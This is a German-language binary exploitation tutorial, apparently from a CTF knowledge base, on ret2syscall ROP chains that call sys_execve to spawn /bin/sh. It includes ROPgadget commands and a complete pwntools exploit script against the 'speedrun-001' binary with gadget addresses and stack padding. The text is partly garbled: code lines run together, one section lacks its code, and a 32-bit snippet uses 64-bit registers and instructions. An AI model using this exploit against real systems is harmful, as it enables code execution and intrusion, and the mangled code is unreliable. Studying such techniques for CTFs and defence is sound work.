Dies ist ähnlich wie Ret2lib, jedoch werden wir in diesem Fall keine Funktion aus einer Bibliothek aufrufen. In diesem Fall wird alles vorbereitet, um den syscall sys_execve mit einigen Argumenten aufzurufen, um /bin/sh auszuführen. Diese Technik wird normalerweise bei statisch kompilierten Binaries durchgeführt, sodass es viele Gadgets und syscall-Anweisungen geben kann.
Um den Aufruf für den syscall vorzubereiten, ist die folgende Konfiguration erforderlich:
rax: 59 Geben Sie sys_execve an
rdi: ptr zu "/bin/sh" geben Sie die auszuführende Datei an
rsi: 0 geben Sie an, dass keine Argumente übergeben werden
rdx: 0 geben Sie an, dass keine Umgebungsvariablen übergeben werden
Im Grunde genommen muss die Zeichenfolge /bin/sh irgendwo geschrieben werden, und dann muss der syscall ausgeführt werden (unter Berücksichtigung des benötigten Paddings zur Kontrolle des Stacks). Dafür benötigen wir ein Gadget, um /bin/sh in einem bekannten Bereich zu schreiben.
Ein weiterer interessanter syscall, den man aufrufen kann, ist mprotect, der es einem Angreifer ermöglichen würde, die Berechtigungen einer Seite im Speicher zu ändern. Dies kann mit ret2shellcode kombiniert werden.
Register-Gadgets
Lassen Sie uns damit beginnen, wie man diese Register kontrolliert:
Dann müssen Sie einen Weg finden, um beliebige Inhalte an dieser Adresse zu schreiben.
ROPgadget --binary speedrun-001| grep " : mov qword ptr \["mov qword ptr [rax], rdx ; ret #Write in the rax address the content of rdx
Automatisiere ROP-Kette
Der folgende Befehl erstellt eine vollständige sys_execve ROP-Kette für eine statische Binärdatei, wenn es Write-What-Where-Gadgets und Syscall-Anweisungen gibt:
ROPgadget--binaryvuln--ropchain
32 Bit
'''Lets write "/bin/sh" to 0x6b6000pop rdx, 0x2f62696e2f736800pop rax, 0x6b6000mov qword ptr [rax], rdx'''rop += popRdx # place value into EAXrop +="/bin"# 4 bytes at a timerop += popRax # place value into edxrop +=p32(0x6b6000)# Writable memoryrop += writeGadget #Address to: mov qword ptr [rax], rdxrop += popRdxrop +="//sh"rop += popRaxrop +=p32(0x6b6000+4)rop += writeGadget
64 Bit
'''Lets write "/bin/sh" to 0x6b6000pop rdx, 0x2f62696e2f736800pop rax, 0x6b6000mov qword ptr [rax], rdx'''rop =''rop += popRdxrop +="/bin/sh\x00"# The string "/bin/sh" in hex with a null byte at the endrop += popRaxrop +=p64(0x6b6000)# Writable memoryrop += writeGadget #Address to: mov qword ptr [rax], rdx
Fehlende Gadgets
Wenn Ihnen Gadgets fehlen, um beispielsweise /bin/sh im Speicher zu schreiben, können Sie die SROP-Technik verwenden, um alle Registerwerte (einschließlich RIP und Parameterregister) vom Stack zu steuern:
from pwn import*target =process('./speedrun-001')#gdb.attach(target, gdbscript = 'b *0x400bad')# Establish our ROP GadgetspopRax =p64(0x415664)popRdi =p64(0x400686)popRsi =p64(0x4101f3)popRdx =p64(0x4498b5)# 0x000000000048d251 : mov qword ptr [rax], rdx ; retwriteGadget =p64(0x48d251)# Our syscall gadgetsyscall =p64(0x40129c)'''Here is the assembly equivalent for these blockswrite "/bin/sh" to 0x6b6000pop rdx, 0x2f62696e2f736800pop rax, 0x6b6000mov qword ptr [rax], rdx'''rop =''rop += popRdxrop +="/bin/sh\x00"# The string "/bin/sh" in hex with a null byte at the endrop += popRaxrop +=p64(0x6b6000)rop += writeGadget'''Prep the four registers with their arguments, and make the syscallpop rax, 0x3bpop rdi, 0x6b6000pop rsi, 0x0pop rdx, 0x0syscall'''rop += popRaxrop +=p64(0x3b)rop += popRdirop +=p64(0x6b6000)rop += popRsirop +=p64(0)rop += popRdxrop +=p64(0)rop += syscall# Add the padding to the saved return addresspayload ="0"*0x408+ rop# Send the payload, drop to an interactive shell to use our new shelltarget.sendline(payload)target.interactive()
64 Bit, nx, kein PIE, schreibe in einen Speicher einen ROP, um execve aufzurufen und dorthin zu springen. Um in den Stack zu schreiben, wird eine Funktion missbraucht, die mathematische Operationen durchführt.
